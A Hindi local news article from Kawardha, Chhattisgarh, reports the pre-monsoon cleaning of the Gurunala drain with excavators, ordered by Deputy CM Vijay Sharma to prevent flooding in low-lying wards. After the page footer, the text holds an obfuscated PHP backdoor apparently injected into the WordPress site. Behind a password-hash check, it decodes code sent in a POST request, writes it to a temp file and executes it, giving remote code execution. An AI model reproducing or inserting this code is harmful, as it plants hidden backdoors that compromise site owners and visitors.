कवर्धाछत्तीसगढ़

चैन माउंटेन पोकलेन व जेसीबी की मदद से शुरू हुई गुरूनाला की सफाई,वार्ड की निचली बस्तियों ने नही होगा जल भराव

डिप्टी सीएम विजय शर्मा ने दिये निर्देश कहा-बारिश के पहले पूर्ण करे सफाई कार्य,नपाध्यक्ष मनहरण कौशिक व उपस्थित जनप्रतिनिधियों की उपस्थिति में शुरू हुआ गुरूनाला का सफाई कार्य

कवर्धा-गुरूनाला का सफाई कार्य प्रारंभ हो गया है गुरूनाला का विभागीय अधिकारियों व जनप्रनिधियों की उपस्थिति में जेसीबी व पोकलैन के मदद से गुरूनाला का सफाई कार्य प्रारंभ कर दिया गया है जो बरसात पूर्व सफाई कार्य पूर्ण कर लिया जायेगा। उप मुख्यमंत्री विजय शर्मा ने शहर की निचली बस्तियों में बरसात के मौसम में होने वाले समस्याओं को ध्यान में रखते हुए शहर के सबसे बड़ा नाला गुरूनाला का बरसात पूर्व साफ-सफाई किये जाने हेतु निर्देशित किया गया है।

डिप्टी सीएम विजय शर्मा ने दिये निर्देश
नगर पालिका अध्यक्ष मनहरण कौशिक ने बताया कि कवर्धा शहर के वार्ड क्रं. 25, 26 व 27 की निचली बस्ती एवं अन्य वार्ड जहां बरसात के मौसम में गुरूनाला का पानी वार्ड में निवासरत लोगों के घर तक पहुंच जाता है इन समस्याओं से निपटने के लिए छत्तीसगढ़ के उप मुख्यमंत्री व कवर्धा विधायक विजय शर्मा ने निर्देशित करते हुए कहा था कि बरसात पूर्व नाला का सफाई किया जावे ताकि बरसात के मौसम में किसी भी वार्डो के निचली बस्तियों में जल भराव की स्थिति उत्पन्न ना हो। उन्होनें बताया कि गुरूनाला की सफाई कार्य हेतु पालिका टीम जुटी हुआ है साथ ही शहर मंडल अध्यक्ष चंद्रप्रकाश चंद्रवंशी, शहर मण्डल उपाध्यक्ष श्रीकान्त उपाध्याय, पार्षद सुनील साहू, पार्षद प्रतिनिधि अनिल साहू, सीएमओ नरेश कुमार वर्मा, कार्यपालन अभियंता एम.एल.कुर्रे, उपअभियंता विरेन्द्र नवघरे के साथ सभी टीम उपस्थित रहे।

नगर पालिका की टीम जुटी सफाई में
नगर पालिका परिषद कवर्धा की टीम कवर्धा शहर का सबसे बड़ा गुरूनाला का साफ-सफाई कार्य में जुटा हुआ है जेसीबी के साथ-साथ सफाई कर्मियों द्वारा नाला का सफाई कार्य किये जाने में लगा हुआ है। गुरूनाला का सफाई बरसात पूर्व किया जाता है गुरूनाला के आसपास लोगों द्वारा मलबा, मिट्टी फेंका जाता है जिसके कारण नाला पट जाता है तथा कुछेक लोगों द्वारा किये गये अवैध अतिक्रमण को हटाया जाकर राजस्व विभाग द्वारा चिन्हांकन करते हुए साफ-सफाई कार्य किया जा रहा है ताकि बारिश के मौसम में पानी का दबाव अधिक होने के कारण शहर की निचली बस्तियों में पानी भरने की समस्याओं से निजात मिल सकेगा।

वार्ड की छोटी-बड़ी नालियों से आता है पानी
गुरूनाला कवर्धा शहर का सबसे बड़ा नाला है वार्ड क्रं. 08 शिक्षक नगर डबरी से शुरू होकर यह नाला शहर वार्डो से गुजरते हुए रायपुर रोड़ के आगे तक मिलता है इस नाला में शहर में निर्मित छोटे-बड़े नालियों का गंदा पानी आकर मिलता है बरसात के मौसम में वर्षा के पानी का दबाव अधिक होने के कारण बरसात का पानी घरो तक घुस जाता है इसलिए प्रतिवर्ष वर्षा पूर्व इस गुरू नाला की सफाई होती है इस वर्ष भी सफाई कार्य जारी है।

बरसात पूर्व हो जायेगा नाला की सफाई
मुख्य नगर पालिका अधिकारी नरेश कुमार वर्मा ने बताया कि बड़े बडे जलीय पौधे, मलबे से गुरूनाला पट चुका है जिसे हटाये जाने का कार्य प्रारंभ कर दिया गया है गुरूनाला में जेसीबी मशीन, पोकलेन मशीन व सफाई कर्मचारियों को उतारा गया है मानव बल व मशीनों की मदद से पूरा गुरूनाला का सफाई कार्य किया जायेगा। ताकि बरसात पूर्व नाला का पूर्ण सफाई हो सके व निचली बस्तियों ने जल भराव की स्थिति उत्पन्न ना हो।

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
×

Powered by WhatsApp Chat

×
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}